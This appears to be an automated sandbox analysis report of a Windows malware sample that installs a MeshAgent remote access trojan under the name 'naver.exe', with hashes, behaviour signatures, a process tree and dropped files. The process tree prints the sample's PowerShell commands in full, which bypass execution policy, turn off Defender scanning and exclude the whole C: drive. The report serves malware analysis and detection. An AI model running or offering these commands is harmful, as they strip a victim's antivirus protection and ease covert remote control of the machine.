Analysis

  • max time kernel
    94s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2024 22:46

General

  • Target

    2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe

  • Size

    19.0MB

  • MD5

    c48e8edc68378461a358bf76afb2cb50

  • SHA1

    1457f5eda579ad7b4772e16378e1d6de312b66c3

  • SHA256

    eae7ea70c95f35b473b9ae7cba6079b6b26d15f4c7167d7119ed4cb0afd7880b

  • SHA512

    77a90eac1d5ab5d59a3c6b0ed8d3700edbfd6096b4c6fa8b03f8802b22234cc384aa7f58b115435629649655fac4144e6d78aaa21e68e2e930e09214b9885bd4

  • SSDEEP

    196608:XDfS4aFBcMkZbmna1cCwvylAjWZ0Xq9YLuxMfCVb2:faF/CinaqtvylAjWZ0Xq9YLuxMfCVb2

Malware Config

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 64 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell " # chcp 65001 > $null; # <-- not working; [Console]::OutputEncoding = [Text.Encoding]::UTF8; # 👈 add this at begin; Get-NetAdapter | foreach { $_ | Select-Object -Property ifAlias, InstanceID } | ConvertTo-Json"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1984
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1308
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4964
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2812
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:1272
          • C:\Users\Admin\AppData\Local\naver\naver.exe
            C:\Users\Admin\AppData\Local\naver\naver.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:4776
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:376
  • C:\Users\Admin\AppData\Local\naver\naver.exe
    "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:2804
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4664
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3992
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
        PID:4196
      • C:\Windows\system32\wbem\wmic.exe
        wmic os get oslanguage /FORMAT:LIST
        2⤵
          PID:1368
        • C:\Windows\System32\wbem\wmic.exe
          wmic SystemEnclosure get ChassisTypes
          2⤵
            PID:2316
          • C:\Windows\System32\wbem\wmic.exe
            wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
            2⤵
              PID:4512
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -noprofile -nologo -command -
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:3908

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            3KB

            MD5

            ccd5df1b2fc53622941f37656d05d9ae

            SHA1

            262f63a6df3450df74215fe2555a9d7002929101

            SHA256

            1c3322f3cbb6d038440ec7a75a3fa5c2f663dac3bb23630db29ad4f5ae180104

            SHA512

            2b85d4cb67230a610a476b62591ccfd6a94f0010210016a260c747aa86959e0badcfb7706698513566dced03b0799e22d25885396fee153c99e7c2d214aaba62

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            0dfa2abef09ea2b3e8423fb7833684fd

            SHA1

            bfbb0511214c332a57778b3707632bfeffb6e781

            SHA256

            7d74773bd09edc36531bcd0f5777254480155694c136c38eb1087ff1a3138c52

            SHA512

            ceb2de65e696f07ebf41453b9341ef3b35ec1a816325d29136bf165aed780bbd5608ed0d96fde46fddaf7be261b062ac95125815616e85884158cfff3b87ede7

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            7a2650a3a864ce36b4edd2168162f6a4

            SHA1

            c5bbf438570fcb5b289d3379c9fad2b391976379

            SHA256

            ed714586203aa7c85099686e71e5a35c18cfd7fdf46d0f0831aaf87967f0a11d

            SHA512

            9feff35421180fd34123a9b589a136eb379edb67a3d0e096a0401ed69f2ec93bd76d740f4243ff1ce30ad1b86036cc63de6603d72a7d7891cd8b4272ee5fe560

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dnd2dl34.255.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\naver\naver.db.tmp

            Filesize

            131KB

            MD5

            5afb7fcd97a028b334e94d2dedbbc598

            SHA1

            00463a944db47fa2392c67459f154fcd06fc29bd

            SHA256

            b49a2585225b96759e4f770833abf2fe4869138dc0c172e0c094382a6e002c55

            SHA512

            01942917f588996cb9d66b21977c7ea06f179c660899c9cf4cb0a0a1310102a9097b0395a4e1f685aedf9ba15c1f6e8cb627073a7ab2f033f59c85188fdea3f5

          • C:\Users\Admin\AppData\Local\naver\naver.exe

            Filesize

            5.3MB

            MD5

            b8d9e0cbbe14c0d930863662e263541c

            SHA1

            b0b51d92b92f21ec721d1cf7cd2358fa81b9fe09

            SHA256

            4b7c8a0f0074b2cd7ac1671f58dfc746fa35b9164462401b1e30710d1dbb6ec9

            SHA512

            a73a40cb1c10a5dad67c39e8d3c4148288a7d869034e813b8bae191c7f8f3d9d07c887decfd3bdb6700c17a8fce303b0df5c8f604ebb3998306c1447bba0b1f7

          • C:\Users\Admin\AppData\Local\naver\naver.msh

            Filesize

            22KB

            MD5

            2dd515ea546a81398d94dd15e3b4d55c

            SHA1

            eb0b0fca721a296906166b7e972559b87353b726

            SHA256

            becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2

            SHA512

            439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb

          • memory/1308-41-0x000001AFF08C0000-0x000001AFF0936000-memory.dmp

            Filesize

            472KB

          • memory/1308-40-0x000001AFF0470000-0x000001AFF04B4000-memory.dmp

            Filesize

            272KB

          • memory/1984-12-0x00007FFCCF100000-0x00007FFCCFBC1000-memory.dmp

            Filesize

            10.8MB

          • memory/1984-18-0x00007FFCCF100000-0x00007FFCCFBC1000-memory.dmp

            Filesize

            10.8MB

          • memory/1984-15-0x000001EBCDD00000-0x000001EBCE228000-memory.dmp

            Filesize

            5.2MB

          • memory/1984-14-0x00007FFCCF100000-0x00007FFCCFBC1000-memory.dmp

            Filesize

            10.8MB

          • memory/1984-13-0x000001EBCD600000-0x000001EBCD7C2000-memory.dmp

            Filesize

            1.8MB

          • memory/1984-0-0x00007FFCCF103000-0x00007FFCCF105000-memory.dmp

            Filesize

            8KB

          • memory/1984-11-0x00007FFCCF100000-0x00007FFCCFBC1000-memory.dmp

            Filesize

            10.8MB

          • memory/1984-10-0x000001EBCD0E0000-0x000001EBCD102000-memory.dmp

            Filesize

            136KB